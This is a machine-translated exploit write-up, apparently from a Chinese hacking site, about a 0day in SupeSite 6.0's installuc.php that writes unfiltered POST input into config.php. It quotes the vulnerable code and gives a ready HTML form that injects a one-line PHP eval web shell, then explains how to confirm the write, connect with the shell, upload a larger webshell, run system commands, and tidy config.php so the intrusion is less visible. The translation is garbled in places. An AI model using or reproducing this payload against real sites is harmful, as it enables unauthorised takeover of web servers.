SupeSite 6.0 direct access to webshell of 0day-vulnerability warning-the black bar safety net

2010-03-11T00:00:00
ID MYHACK58:62201026393
Type myhack58
Reporter 佚名
Modified 2010-03-11T00:00:00

Description

For me some tasteless feeling,because the vulnerability where the file is a configuration file, if the target site has been configured through this file, then we cannot exploit the vulnerability, and timely is not configured, it is also possible unsuccessful, of course, there's still a part of the site is not configured through the file. Although now supesite official version has gone out to 7. 0, but 6. 0 also application in many servers, also count for a small part of the site some of the threats, the vulnerabilities people know very little. Cut the crap, 漏洞出现在installuc.php file, download from the official website the source code is zend encrypted, we can dezend. cc in the decryption, of course, also can use the tool. Because I'm lazy, simply from the online to find the test target. I just find one, such as Figure one:

!

! if you display this page while it proved to be also not configured. That is perhaps the can take advantage of. We take a look at the source code in the middle there is such a few paragraphs

else if ( $step == 1 )

{

......

}

else if ( $step == 2 )

{

......

}

else if ( $step == 3 )

{

......

}

Meaning configuration of the first step, the second portion, the third step. There is a loophole somewhere in the setp=3 places:

function insertconfig( $s, $find, $replace ) / write function /

{

......

}

$ssconfig = S_ROOT."/ config.php";

$ucdbhost = $_POST['ucdbhost']; / we want to use the variable /

$ucdbuser = $_POST['ucdbuser'];

......

$s = file_get_contents( $ssconfig );

$s = trim( $s );

$s = substr( $s, 0 - 2 ) == "?& gt;" ? substr( $s, 0, 0 - 2 ) : $s;

$s = insertconfig( $s, "/define\\('UC_CONNECT',\\s'.?'\\);/ i", "define('UC_CONNECT', 'mysql');" ); / call write function /

$s = insertconfig( $s, "/define\\('UC_DBHOST',\\s'.?'\\);/ i", "define('UC_DBHOST', '{$ucdbhost}');" );

$s = insertconfig( $s, "/define\\('UC_DBUSER',\\s'.?'\\);/ i", "define('UC_DBUSER', '{$ucdbuser}');" );

......

if ( ! ( $fp = @fopen( $ssconfig, "w" ) ) )

{

instmsg( "configuration file write failed, please return to check ./ config.php permission is 0 7 7 7 " );

}

@fwrite( $fp, $s );

@fclose( $fp );

if ( $fp = @fopen( $lockfile, "w" ) )

{

fwrite( $fp, "" );

fclose( $fp );

}

print "\t<table class=\"showtable\">\r\n\t<tr><td><strong># the configuration is complete</strong></td></tr>\r\n\t<tr><td id=\"msg1\">\r\n\t<br /> Completed UCenter configuration, please visit the FTP delete installuc. php this file\r\n\t<br />\r\n\t<br /><a href=\"javascript:;\" onclick=\"javascript:backwindow('installuc', ");\">click to return to the main interface,the next step of the operation</a>\r\n\t</td></tr>\r\n\t\r\n\t</table>";

Code too much, similar The code is omitted, the code above we can see that the variables by the post input to obtain, not through any filter directly write to the config. php file.

Now I provide a simple to make use of program code

<body>

<div class="bodydiv">

<h1>configuration table</h1>

<div style="width:9 0%;margin:0 auto;">

<br><form id="theform" method="post" action="http://www.xxx.com/installuc.php?step=3">

<table class="showtable">

<tr><td><strong># fill in the relevant information don't share it! thx</strong></td></tr>

<tr><td id="msg1">here set UCenter related information</td></tr>

</table>

<br>

<table class=datatable>

<tr>

<td width="1 5%">$code:</td>

<td><input type="text" id="ucdbhost" name="ucdbhost" size="6 0" value="\');eval($_POST[sunwear]);?& gt;"></td>

<td width="2 0%"> </td>

</tr>

</table>

<input type="hidden" name="apptype" value="SUPESITE">

<p align="center">

<input type="submit" name="submit" value=" submit " style="height: 2 5">

</p>

</form></div>

<div id="footer">© Comsenz Inc. 2001-2008 www.supesite.com</div>

</div>

<br>

</body>

</html>

The inside of the replacement address into the target address. My code in the step parameter is 3, so a direct submission we want to use the variable content you can, do not need other settings. Trojan content is in a word, the connection password for the sunwear now I find the test target to the test. After submission if the returned content is

The configuration is complete

Completed UCenter configuration, please visit the FTP delete installuc. php this file

Click to return to the main interface,Proceed to the next operation

So on behalf of the submission is successful, if the access config. the php page will display

'); // UCenter database host define('UC_DBUSER', "); // UCenter database user name define('UC_DBPW', "); // UCenter database password define('UC_DBNAME', "); // UCenter name of the database define('UC_DBCHARSET', "); // UCenter database character set define('UC_DBTABLEPRE', "`.'); // UCenter database table prefix define('UC_DBCONNECT', '0'); // UCenter database persistent connection 0=OFF, 1=on // communication-related define('UC_KEY', "); // UCenter communication key, to with UCenter consistent define('UC_API', "); // UCenter the URL address, in call picture when you rely on this constant define('UC_CHARSET', "); // UCenter character set define('UC_IP', "); // UCenter of IP, when UC_CONNECTFor non-mysql mode, and the current application server to resolve the domain name when there is a problem, please set this value define('UC_APPID', "); // the current application ID// ============================================================================ define('UC_PPP', '2 0');

On behalf of the Trojans have been written to the config. in php, the reason for this display is because writing the code at the end is"?& gt;"in order to be able to parse PHP Trojan code, so the code behind are treated as ordinary characters to display. Now we use the PHP word Trojan connection to the target website, then you can upload Malaysia the. The Phpinfo()results display is the linux operating system, this vulnerability is not limited to gpc switch effects at the same time, also affect the windows operating system, in some php execute permissions higher on windows can be directly used phpwebshell execute system commands. We are in possession limit after also can not forget, if the config. php has this, the home display will appear an error, so we have to put the file changes to normal, to put below this sentence

define('UC_DBHOST', '\\');eval($_POST[sharpwinner]);?& gt;');

Replaced

define('UC_DBHOST', ");

You can.

The above is a successful example, some sites submitted after the prompt after the configuration is complete, access the config. php will display a blank, it would represent a failure.